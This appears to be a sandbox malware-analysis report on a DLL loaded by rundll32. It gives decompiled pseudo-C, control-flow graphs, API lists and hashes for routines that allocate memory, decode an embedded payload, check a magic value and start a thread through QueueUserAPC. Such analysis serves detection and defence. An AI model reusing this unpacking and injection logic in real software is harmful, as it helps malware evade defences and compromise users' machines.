                          control_flow_graph 228 10817a7-10817bb 229 108182c-1081839 InterlockedDecrement 228->229 230 10817bd-10817be 228->230 231 1081879-1081880 229->231 232 108183b-1081841 229->232 230->231 233 10817c4-10817d1 InterlockedIncrement 230->233 234 108186d-1081873 HeapDestroy 232->234 235 1081843 232->235 233->231 236 10817d7-10817eb HeapCreate 233->236 234->231 237 1081848-1081858 SleepEx 235->237 238 10817ed-108181e call 1082042 call 1081e53 236->238 239 1081827-108182a 236->239 240 108185a-108185f 237->240 241 1081861-1081867 CloseHandle 237->241 238->231 246 1081820-1081823 238->246 239->231 240->237 240->241 241->234 246->239
                          C-Code - Quality: 86%
                          			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                          				long _v8;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				char _t9;
                          				void* _t10;
                          				void* _t18;
                          				void* _t23;
                          				void* _t36;
                          
                          				_push(__ecx);
                          				_t9 = _a8;
                          				_v8 = 1;
                          				if(_t9 == 0) {
                          					_t10 = InterlockedDecrement(0x1084188);
                          					__eflags = _t10;
                          					if(_t10 == 0) {
                          						__eflags =  *0x108418c;
                          						if( *0x108418c != 0) {
                          							_t36 = 0x2328;
                          							while(1) {
                          								SleepEx(0x64, 1);
                          								__eflags =  *0x1084198;
                          								if( *0x1084198 == 0) {
                          									break;
                          								}
                          								_t36 = _t36 - 0x64;
                          								__eflags = _t36;
                          								if(_t36 > 0) {
                          									continue;
                          								}
                          								break;
                          							}
                          							CloseHandle( *0x108418c);
                          						}
                          						HeapDestroy( *0x1084190);
                          					}
                          				} else {
                          					if(_t9 == 1 && InterlockedIncrement(0x1084188) == 1) {
                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                          						_t41 = _t18;
                          						 *0x1084190 = _t18;
                          						if(_t18 == 0) {
                          							L6:
                          							_v8 = 0;
                          						} else {
                          							 *0x10841b0 = _a4;
                          							asm("lock xadd [eax], edi");
                          							_push( &_a8);
                          							_t23 = E01081E53(E01082093, E01082042(_a12, 1, 0x1084198, _t41));
                          							 *0x108418c = _t23;
                          							if(_t23 == 0) {
                          								asm("lock xadd [esi], eax");
                          								goto L6;
                          							}
                          						}
                          					}
                          				}
                          				return _v8;
                          			}
                          0x010817aa
                          0x010817b6
                          0x010817b8
                          0x010817bb
                          0x01081831
                          0x01081837
                          0x01081839
                          0x0108183b
                          0x01081841
                          0x01081843
                          0x01081848
                          0x0108184b
                          0x01081856
                          0x01081858
                          0x00000000
                          0x00000000
                          0x0108185a
                          0x0108185d
                          0x0108185f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0108185f
                          0x01081867
                          0x01081867
                          0x01081873
                          0x01081873
                          0x010817bd
                          0x010817be
                          0x010817de
                          0x010817e4
                          0x010817e6
                          0x010817eb
                          0x01081827
                          0x01081827
                          0x010817ed
                          0x010817f5
                          0x010817fc
                          0x01081806
                          0x01081812
                          0x01081819
                          0x0108181e
                          0x01081823
                          0x00000000
                          0x01081823
                          0x0108181e
                          0x010817eb
                          0x010817be
                          0x01081880

                          APIs
                          • InterlockedIncrement.KERNEL32(01084188), ref: 010817C9
                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 010817DE
                            • Part of subcall function 01081E53: CreateThread.KERNELBASE ref: 01081E6A
                            • Part of subcall function 01081E53: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 01081E7F
                            • Part of subcall function 01081E53: GetLastError.KERNEL32(00000000), ref: 01081E8A
                            • Part of subcall function 01081E53: TerminateThread.KERNEL32(00000000,00000000), ref: 01081E94
                            • Part of subcall function 01081E53: CloseHandle.KERNEL32(00000000), ref: 01081E9B
                            • Part of subcall function 01081E53: SetLastError.KERNEL32(00000000), ref: 01081EA4
                          • InterlockedDecrement.KERNEL32(01084188), ref: 01081831
                          • SleepEx.KERNEL32(00000064,00000001), ref: 0108184B
                          • CloseHandle.KERNEL32 ref: 01081867
                          • HeapDestroy.KERNEL32 ref: 01081873
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                          • String ID:
                          • API String ID: 2110400756-0
                          • Opcode ID: 2f830e852b9a8ec18610ec54b56410977d3816ae1c0e24178a6be66d7ca005ea
                          • Instruction ID: 77c18cf2f6d36d777a3a86b410127773fd7c86d1331bbac11f5a207db1342789
                          • Opcode Fuzzy Hash: 2f830e852b9a8ec18610ec54b56410977d3816ae1c0e24178a6be66d7ca005ea
                          • Instruction Fuzzy Hash: 61219D71B18206EFCB21AFADE885A5D7FE8FBA4B60B504479F5C5D6144E635C802CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E01081E53(long _a4, DWORD* _a12) {
                          				_Unknown_base(*)()* _v0;
                          				void* _t4;
                          				long _t6;
                          				long _t11;
                          				void* _t13;
                          
                          				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10841cc, 0, _a12); // executed
                          				_t13 = _t4;
                          				if(_t13 != 0) {
                          					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                          					if(_t6 == 0) {
                          						_t11 = GetLastError();
                          						TerminateThread(_t13, _t11);
                          						CloseHandle(_t13);
                          						_t13 = 0;
                          						SetLastError(_t11);
                          					}
                          				}
                          				return _t13;
                          			}
                          0x01081e6a
                          0x01081e70
                          0x01081e74
                          0x01081e7f
                          0x01081e87
                          0x01081e90
                          0x01081e94
                          0x01081e9b
                          0x01081ea2
                          0x01081ea4
                          0x01081eaa
                          0x01081e87
                          0x01081eae

                          APIs
                          • CreateThread.KERNELBASE ref: 01081E6A
                          • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 01081E7F
                          • GetLastError.KERNEL32(00000000), ref: 01081E8A
                          • TerminateThread.KERNEL32(00000000,00000000), ref: 01081E94
                          • CloseHandle.KERNEL32(00000000), ref: 01081E9B
                          • SetLastError.KERNEL32(00000000), ref: 01081EA4
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                          • String ID:
                          • API String ID: 3832013932-0
                          • Opcode ID: ae4c2a7fc99a92baf3a018c24d0213f21e6b593a239a051eae82fdaf5e2dc10c
                          • Instruction ID: 7914bf36553371474076e76e38c2a2d11e7f79f92bd83b19e25c23aeaba0fa9b
                          • Opcode Fuzzy Hash: ae4c2a7fc99a92baf3a018c24d0213f21e6b593a239a051eae82fdaf5e2dc10c
                          • Instruction Fuzzy Hash: C1F03A32208621AFD7325BA0AC28B4FBAA8BF88B41F004500F6C599154C72BC8029FA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 319 e11a0c-e11a2e RtlInitializeCriticalSection 320 e11a30-e11a35 RtlEnterCriticalSection 319->320 321 e11a3a-e11a70 call e113d0 * 3 LocalAlloc 319->321 320->321 328 e11aa1-e11ab5 321->328 329 e11a72 321->329 331 e11ac1 328->331 332 e11ab7-e11abc RtlLeaveCriticalSection 328->332 330 e11a77-e11a89 329->330 330->330 333 e11a8b-e11a9a 330->333 332->331 333->328
                          C-Code - Quality: 68%
                          			E00E11A0C() {
                          				void* _t11;
                          				signed int _t13;
                          				intOrPtr _t19;
                          				void* _t20;
                          				intOrPtr _t23;
                          
                          				_push(_t23);
                          				_push(E00E11AC2);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t23;
                          				_push(0xe7f5cc);
                          				L00E11360();
                          				if( *0xe7f04d != 0) {
                          					_push(0xe7f5cc);
                          					L00E11368();
                          				}
                          				E00E113D0(0xe7f5ec);
                          				E00E113D0(0xe7f5fc);
                          				E00E113D0(0xe7f628);
                          				_t11 = LocalAlloc(0, 0xff8); // executed
                          				 *0xe7f624 = _t11;
                          				if( *0xe7f624 != 0) {
                          					_t13 = 3;
                          					do {
                          						_t20 =  *0xe7f624; // 0x901688
                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                          						_t13 = _t13 + 1;
                          					} while (_t13 != 0x401);
                          					 *((intOrPtr*)(0xe7f610)) = 0xe7f60c;
                          					 *0xe7f60c = 0xe7f60c;
                          					 *0xe7f618 = 0xe7f60c;
                          					 *0xe7f5c4 = 1;
                          				}
                          				_pop(_t19);
                          				 *[fs:eax] = _t19;
                          				_push(E00E11AC9);
                          				if( *0xe7f04d != 0) {
                          					_push(0xe7f5cc);
                          					L00E11370();
                          					return 0;
                          				}
                          				return 0;
                          			}
                          0x00e11a11
                          0x00e11a12
                          0x00e11a17
                          0x00e11a1a
                          0x00e11a1d
                          0x00e11a22
                          0x00e11a2e
                          0x00e11a30
                          0x00e11a35
                          0x00e11a35
                          0x00e11a3f
                          0x00e11a49
                          0x00e11a53
                          0x00e11a5f
                          0x00e11a64
                          0x00e11a70
                          0x00e11a72
                          0x00e11a77
                          0x00e11a77
                          0x00e11a7f
                          0x00e11a83
                          0x00e11a84
                          0x00e11a90
                          0x00e11a93
                          0x00e11a95
                          0x00e11a9a
                          0x00e11a9a
                          0x00e11aa3
                          0x00e11aa6
                          0x00e11aa9
                          0x00e11ab5
                          0x00e11ab7
                          0x00e11abc
                          0x00000000
                          0x00e11abc
                          0x00e11ac1

                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A22
                          • RtlEnterCriticalSection.KERNEL32(00E7F5CC,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A35
                          • LocalAlloc.KERNEL32(00000000,00000FF8,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A5F
                          • RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E11AC9,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11ABC
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                          • String ID:
                          • API String ID: 730355536-0
                          • Opcode ID: c57615d81f78a951bef1046631a191ecd34dde750dd24e57fd20505bd6cf4871
                          • Instruction ID: 31df2afb0da8e25ae78553d9e70f089c07bf194b6b3ef394e243ddf5ec53b93a
                          • Opcode Fuzzy Hash: c57615d81f78a951bef1046631a191ecd34dde750dd24e57fd20505bd6cf4871
                          • Instruction Fuzzy Hash: 500126706053405ED711EFA9D8067943BC0EB49B40F41B0F5E219F6AE2C5B44CC0CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 87%
                          			E01082093(void* __ecx, char _a4) {
                          				long _t3;
                          				int _t4;
                          				int _t9;
                          				void* _t13;
                          
                          				_t13 = GetCurrentThread();
                          				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                          				if(_t3 != 0) {
                          					SetThreadPriority(_t13, 0xffffffff); // executed
                          				}
                          				_t4 = E010814BA(_a4); // executed
                          				_t9 = _t4;
                          				if(_t9 == 0) {
                          					SetThreadPriority(_t13, _t4);
                          				}
                          				asm("lock xadd [eax], ecx");
                          				return _t9;
                          			}
                          0x0108209c
                          0x010820a1
                          0x010820af
                          0x010820b4
                          0x010820b4
                          0x010820ba
                          0x010820bf
                          0x010820c3
                          0x010820c7
                          0x010820c7
                          0x010820d1
                          0x010820da

                          APIs
                          • GetCurrentThread.KERNEL32 ref: 01082096
                          • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 010820A1
                          • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 010820B4
                          • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 010820C7
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$Priority$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1452675757-0
                          • Opcode ID: 141c7f84a11c73a7604772712a1f3b934a2025ba5a84aff641975d4308c1eb1d
                          • Instruction ID: c60d0dc9590e1138a9c887ac247bd8ce9d080c4ea9a2abaea3406fcad363747b
                          • Opcode Fuzzy Hash: 141c7f84a11c73a7604772712a1f3b934a2025ba5a84aff641975d4308c1eb1d
                          • Instruction Fuzzy Hash: E8E06D3120D6116BA2227A2D5C94E6F7B9DFF916307110325F6E0D62D0CB59C8038AA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 341 1081883-10818a4 call 1081aa4 344 10818aa-10818e4 VirtualAlloc 341->344 345 10819be-10819c3 341->345 346 10818ea-10818f0 344->346 347 10819b6 344->347 348 1081981 346->348 349 10818f6-108190d 346->349 350 10819bd 347->350 351 1081986-108198b 348->351 352 108190e-1081938 349->352 350->345 353 108199d 351->353 354 108198d-108199b call 10820fb 351->354 355 108193b-1081945 352->355 359 10819a4-10819b4 VirtualFree 353->359 354->359 356 1081955 355->356 357 1081947-1081953 355->357 360 108195c-108195f 356->360 357->360 359->350 360->355 362 1081961-108197c 360->362 362->352 363 108197e-108197f 362->363 363->351
                          C-Code - Quality: 90%
                          			E01081883(void* __edi, intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				char _v16;
                          				void* _v20;
                          				unsigned int _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				void* _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				signed int _v52;
                          				signed int _v56;
                          				intOrPtr _t52;
                          				void* _t59;
                          				intOrPtr _t60;
                          				intOrPtr _t70;
                          				signed int _t79;
                          				intOrPtr* _t84;
                          				intOrPtr _t87;
                          				void* _t88;
                          				intOrPtr _t91;
                          				intOrPtr _t93;
                          				intOrPtr _t94;
                          				intOrPtr _t96;
                          
                          				_t93 =  *0x10841b0;
                          				_t52 = E01081AA4(_t93,  &_v32,  &_v24);
                          				_v28 = _t52;
                          				if(_t52 == 0) {
                          					asm("sbb ebx, ebx");
                          					_t79 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
                          					_t94 = _t93 + _v32;
                          					_v44 = _t94;
                          					_t59 = VirtualAlloc(0, _t79 << 0xc, 0x3000, 4); // executed
                          					_v36 = _t59;
                          					if(_t59 == 0) {
                          						_v28 = 8;
                          					} else {
                          						_v8 = _v8 & 0x00000000;
                          						if(_t79 <= 0) {
                          							_t60 =  *0x10841cc;
                          						} else {
                          							_t87 = _a4;
                          							_v12 = _t94;
                          							_v12 = _v12 - _t59;
                          							_t16 = _t87 + 0x10851a7; // 0x10851a7
                          							_t88 = _t59 - _t94 + _t16;
                          							_v20 = _t59;
                          							do {
                          								asm("movsd");
                          								asm("movsd");
                          								asm("movsd");
                          								_v16 = 0x400;
                          								_t96 = 0;
                          								_t84 = _v20;
                          								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
                          								do {
                          									_t70 =  *((intOrPtr*)(_v12 + _t84));
                          									_t91 = _t70;
                          									if(_t70 == 0) {
                          										_v16 = 1;
                          									} else {
                          										 *_t84 = _t70 + _t96 - _v40;
                          										_t96 = _t91;
                          										_t84 = _t84 + 4;
                          									}
                          									_t33 =  &_v16;
                          									 *_t33 = _v16 - 1;
                          								} while ( *_t33 != 0);
                          								_t35 = _t88 + 0xc; // 0xbed0c07d
                          								_t36 = _t88 + 8; // 0xeb423b03
                          								_v20 = _v20 + 0x1000;
                          								_t39 = _t88 + 4; // 0xcac4b65b
                          								_t60 =  *_t35 -  *_t36 +  *_t39;
                          								_v8 = _v8 + 1;
                          								 *0x10841cc = _t60;
                          							} while (_v8 < _t79);
                          						}
                          						if(_t60 != 0x69b25f44) {
                          							_v28 = 9;
                          						} else {
                          							E010820FB(_v24, _v36, _v44);
                          						}
                          						VirtualFree(_v36, 0, 0x8000); // executed
                          					}
                          				}
                          				return _v28;
                          			}
                          0x0108188a
                          0x0108189a
                          0x010818a1
                          0x010818a4
                          0x010818b9
                          0x010818c0
                          0x010818c5
                          0x010818d6
                          0x010818d9
                          0x010818e1
                          0x010818e4
                          0x010819b6
                          0x010818ea
                          0x010818ea
                          0x010818f0
                          0x01081981
                          0x010818f6
                          0x010818f6
                          0x010818fd
                          0x01081900
                          0x01081903
                          0x01081903
                          0x0108190a
                          0x0108190e
                          0x01081919
                          0x0108191a
                          0x0108191b
                          0x01081922
                          0x0108192f
                          0x01081935
                          0x01081938
                          0x0108193b
                          0x0108193e
                          0x01081943
                          0x01081945
                          0x01081955
                          0x01081947
                          0x0108194c
                          0x0108194e
                          0x01081950
                          0x01081950
                          0x0108195c
                          0x0108195c
                          0x0108195c
                          0x01081961
                          0x01081964
                          0x01081967
                          0x0108196e
                          0x0108196e
                          0x01081971
                          0x01081977
                          0x01081977
                          0x0108197e
                          0x0108198b
                          0x0108199d
                          0x0108198d
                          0x01081996
                          0x01081996
                          0x010819ae
                          0x010819ae
                          0x010819bd
                          0x010819c3

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,0108152F), ref: 010818D9
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 010819AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID: Dec 26 2021
                          • API String ID: 2087232378-1220097468
                          • Opcode ID: a49a3089fa5736c9568f89b9eaeb1c4a3af6c24e2837aaa0463557f35cb14e34
                          • Instruction ID: 3f41d831c33d2d4dc729d7495b406e70f6b3cd57216b93d37edf017ff5b8a2fe
                          • Opcode Fuzzy Hash: a49a3089fa5736c9568f89b9eaeb1c4a3af6c24e2837aaa0463557f35cb14e34
                          • Instruction Fuzzy Hash: E8412871A0421A9FDB11DF98D980BEEBBF8BF08314F144169E9C5FB241D375AA06CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (rendered graph not reproduced)
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00EDA36B
                          • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00EDA512
                          Memory Dump Source
                          • Source File: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_ed0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProtect
                          • String ID:
                          • API String ID: 2447062925-0
                          • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                          • Instruction ID: 0ed6b458fd940c96c870b2e32387f541fba06bfed9a47a1109e440caae5f3a4c
                          • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                          • Instruction Fuzzy Hash: C5919875A00109DFCB48CF88D590EAEB7B6FF88304F149159E819AB346D735EA52CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (rendered graph not reproduced)
                          APIs
                            • Part of subcall function 00E11A0C: RtlInitializeCriticalSection.KERNEL32(00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A22
                            • Part of subcall function 00E11A0C: RtlEnterCriticalSection.KERNEL32(00E7F5CC,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A35
                            • Part of subcall function 00E11A0C: LocalAlloc.KERNEL32(00000000,00000FF8,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A5F
                            • Part of subcall function 00E11A0C: RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E11AC9,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11ABC
                          • RtlEnterCriticalSection.KERNEL32(00E7F5CC,00000000,00E12274), ref: 00E12143
                          • RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E1227B), ref: 00E1226E
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                          • String ID:
                          • API String ID: 2227675388-0
                          • Opcode ID: ef61cb8c78ce2eacb150ce7ffc2e4a0cf4117b85617622713757e7dc7589be9b
                          • Instruction ID: db5e3692d350d2e849497eccfa84754601698180ecfd908e11f72662b56a9ab9
                          • Opcode Fuzzy Hash: ef61cb8c78ce2eacb150ce7ffc2e4a0cf4117b85617622713757e7dc7589be9b
                          • Instruction Fuzzy Hash: 2241DEB2A05340AFDB14CF69EC816A977E0FB59314B15A2BDD619F72A1E23098D5CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (rendered graph not reproduced)
                          APIs
                          • VirtualProtect.KERNELBASE(?,00000004,00000040,?), ref: 00EDA7DB
                          • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 00EDA813
                          Memory Dump Source
                          • Source File: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_ed0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                          • Instruction ID: d02236d8a254a9976e9b65c809b6d1c0e62a8009adcbe97a5c3e68d18206646a
                          • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                          • Instruction Fuzzy Hash: DC416674E00209DFCB08CF88C895AEDB7B6FF88314F1481A9E915AB355D775AA42CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (rendered graph not reproduced)
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00ED9E54
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_ed0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: VirtualAlloc
                          • API String ID: 4275171209-164498762
                          • Opcode ID: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                          • Instruction ID: 314d91b97806967d572a5d01a174b295d44570389358683d3b6f65e643a01ff3
                          • Opcode Fuzzy Hash: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                          • Instruction Fuzzy Hash: CB1130A0D08289EAEB01D7E898097EFBFB55B11708F044099D5447A282D2BA575987A6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E11524(void* __eax, void** __edx) {
                          				void* _t3;
                          				void** _t8;
                          				void* _t11;
                          				long _t14;
                          
                          				_t8 = __edx;
                          				if(__eax >= 0x100000) {
                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                          				} else {
                          					_t14 = 0x100000;
                          				}
                          				_t8[1] = _t14;
                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                          				_t11 = _t3;
                          				 *_t8 = _t11;
                          				if(_t11 != 0) {
                          					_t3 = E00E113D8(0xe7f5ec, _t8);
                          					if(_t3 == 0) {
                          						VirtualFree( *_t8, 0, 0x8000);
                          						 *_t8 = 0;
                          						return 0;
                          					}
                          				}
                          				return _t3;
                          			}

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00E1182D), ref: 00E11553
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00E1182D), ref: 00E1157A
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 4b69a9b64a3d2163cbbea1da9f21f7214fb6c2ee47d4543fc76541b8bd9cc743
                          • Instruction ID: 856989893322668e083d0726bc1dac2830dbe28448550cc3d928ffde8cef7158
                          • Opcode Fuzzy Hash: 4b69a9b64a3d2163cbbea1da9f21f7214fb6c2ee47d4543fc76541b8bd9cc743
                          • Instruction Fuzzy Hash: CFF082B2A0062057DB60596A5C85BD256C69B85B90F1951F0FB0DFF2C9D6A18C8182A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E15340(void* __eax) {
                          				char _v272;
                          				intOrPtr _t14;
                          				void* _t16;
                          				intOrPtr _t18;
                          				intOrPtr _t19;
                          
                          				_t16 = __eax;
                          				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                          					_t3 = _t16 + 4; // 0xe10000
                          					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                          					_t14 = E00E1557C(_t19); // executed
                          					_t18 = _t14;
                          					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                          					if(_t18 == 0) {
                          						_t5 = _t16 + 4; // 0xe10000
                          						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                          					}
                          				}
                          				return  *((intOrPtr*)(_t16 + 0x10));
                          			}

                          APIs
                          • GetModuleFileNameA.KERNEL32(00E10000,?,00000105), ref: 00E1535E
                            • Part of subcall function 00E1557C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00E7C0A4), ref: 00E15598
                            • Part of subcall function 00E1557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155B6
                            • Part of subcall function 00E1557C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155D4
                            • Part of subcall function 00E1557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00E155F2
                            • Part of subcall function 00E1557C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00E1563B
                            • Part of subcall function 00E1557C: RegQueryValueExA.ADVAPI32(?,00E157E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001), ref: 00E15659
